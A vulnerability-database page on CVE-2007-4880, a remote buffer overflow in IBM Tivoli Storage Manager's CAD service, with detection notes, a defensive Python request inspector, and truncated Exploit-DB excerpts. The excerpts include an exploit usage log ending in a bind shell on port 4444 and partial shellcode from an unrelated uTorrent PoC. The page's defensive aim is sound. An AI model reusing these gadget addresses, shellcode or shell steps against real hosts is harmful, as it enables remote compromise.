CVE-2007-4880
Published 2007-09-28

Buffer overflow in the Client Acceptor Daemon (CAD), dsmcad.exe, in certain IBM Tivoli Storage Manager (TSM) clients 5.1 before 5.1.8.1, 5.2 before 5.2.5.2, 5.3 before 5.3.5.3, and 5.4 before 5.4.1.2 allows remote attackers to execute arbitrary code via crafted HTTP headers, aka IC52905.

Priority: P2 (70), critical. CVSS 2.0 base score 10, vector AV:N/AC:L/Au:N/C:C/I:C/A:C. Exploit available. EPSS: 75.94% (99.5th percentile).
Affected: 8 ranges (version boundaries are given in the description above)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | tivoli_storage_manager_client | — | — |
Detection & IOCs (extracted from sources)

bytes: \x38\x07\xD2\x77 (little-endian encoding of 0x77D20738, the User32.dll JMP ESP address noted below)

- Detect exploit attempts by monitoring for oversized HTTP Host headers in requests to TCP port 1581 targeting the /BACLIENT URI path, which is the attack vector for this CAD service buffer overflow.
- Alert on GET requests to /BACLIENT on port 1581 where the Host header value exceeds ~190 bytes, consistent with the overflow trigger.
- Monitor for unexpected outbound bind-shell connections on port 4444 from the dsmcad.exe process following inbound connections on port 1581.
- The payload avoids the bad characters \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c; network signatures should look for long alpha-encoded shellcode blobs in the Host header of HTTP requests to port 1581.
- The exploit uses EXITFUNC=seh, so look for SEH-chain overwrites in crash dumps or exception handler telemetry from dsmcad.exe.
- The JMP ESP gadget address (0x77D20738 in User32.dll) is specific to Windows 2000 SP0 EN; the Metasploit module uses a different return address (0x0289fbe3 in dbghelp.dll) targeting TSM Express 5.3.3 on Windows 2003 Server SP0. Signatures relying on these hardcoded addresses will not generalise across OS/patch levels.
- Vulnerable versions are TSM clients 5.1 before 5.1.8.1, 5.2 before 5.2.5.2, 5.3 before 5.3.5.3, and 5.4 before 5.4.1.2; detection rules should be scoped to hosts running these specific version ranges.
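The two request-level detections above (GET /BACLIENT on tcp/1581 with an oversized Host header, and the User32.dll gadget bytes listed as an IOC) can be checked by a small request inspector. The following is an added example written for this page, not code from the advisory, Exploit-DB entries or the Metasploit module; the 190-byte cut-off is taken literally from the "~190 bytes" note and is an assumption, and the two sample requests are constructed, not captured traffic.

```python
"""Request inspector for the CVE-2007-4880 detection notes (added example).

Flags HTTP requests to the TSM client acceptor daemon port whose GET /BACLIENT
Host header is oversized, and separately reports the User32.dll JMP ESP gadget
bytes the page lists as an IOC. Assumption: HOST_LEN_THRESHOLD is the "~190"
figure from the notes used as an exact cut-off.
"""
import re

CAD_PORT = 1581                      # CAD HTTP listener port named in the notes
CAD_PATH = "/BACLIENT"               # URI path named in the notes
HOST_LEN_THRESHOLD = 190             # assumed exact cut-off for "~190 bytes"
GADGET_BYTES = b"\x38\x07\xD2\x77"   # little-endian 0x77D20738 (IOC on this page)

# Request line: METHOD SP PATH SP HTTP/1.x (lines are split on CRLF first)
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]$")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers); None if malformed.

    Header values are kept as bytes because an overflow payload need not be
    valid text; header names are lower-cased for lookup.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            continue
        headers[name.strip().lower()] = value.strip()
    method = match.group(1).decode("ascii")
    path = match.group(2).decode("ascii", "replace")
    return method, path, headers


def inspect_request(raw: bytes, dst_port: int):
    """Return a list of finding strings for one request; empty means nothing matched."""
    findings = []
    if dst_port != CAD_PORT:
        return findings                      # rules are scoped to the CAD port only
    parsed = parse_request(raw)
    if parsed is None:
        findings.append("malformed request line on CAD port")
        return findings
    method, path, headers = parsed
    host = headers.get(b"host", b"")
    if method == "GET" and path.startswith(CAD_PATH) and len(host) > HOST_LEN_THRESHOLD:
        findings.append(
            f"oversized Host header ({len(host)} bytes) in GET {CAD_PATH} on tcp/{CAD_PORT}"
        )
    if GADGET_BYTES in host:
        findings.append("User32.dll JMP ESP gadget bytes 38 07 D2 77 present in Host header")
    return findings


# Constructed samples: a normal CAD request and one with a padded Host header
# carrying the gadget bytes (filler only, no shellcode).
SAMPLE_BENIGN = b"GET /BACLIENT HTTP/1.0\r\nHost: tsm-client.example.internal\r\n\r\n"
SAMPLE_SUSPECT = (
    b"GET /BACLIENT HTTP/1.0\r\nHost: " + b"A" * 300 + GADGET_BYTES + b"\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN), ("suspect", SAMPLE_SUSPECT)):
        print(label, inspect_request(sample, CAD_PORT) or ["no findings"])
```

The port check comes first so the same inspector can be run over all observed HTTP without scoping rules elsewhere; the gadget-byte check is reported separately because, as the notes say, the hardcoded address only applies to one OS/patch level and should not be the sole signal.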
No detection rules found.
Exploit-DB (exploitdb, 2010-05-09, CVE-2007-4880)
IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)
---
##
# $Id: ibm_tsm_cad_header.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LI
Exploit-DB (exploitdb, 2007-10-27, CVE-2007-4880)
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
---
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.
Exploit-DB (exploitdb, 2007-02-12, CVE-2007-0927)
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
---
/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and w2k sp1-4
*
*/
#include
#include
#define NASIZE 4880
unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";
// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x
Metasploit
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
No writeups or analysis indexed.
References
- http://osvdb.org/38161
- http://secunia.com/advisories/26883
- http://securityreason.com/securityalert/3184
- http://www-1.ibm.com/support/docview.wss?uid=swg21268775
- http://www-1.ibm.com/support/search.wss?rs=0&q=IC52905&apar=only
- http://www.securityfocus.com/archive/1/480492
- http://www.securityfocus.com/bid/25743
- http://www.securitytracker.com/id?1018725
- http://www.vupen.com/english/advisories/2007/3228
- http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36700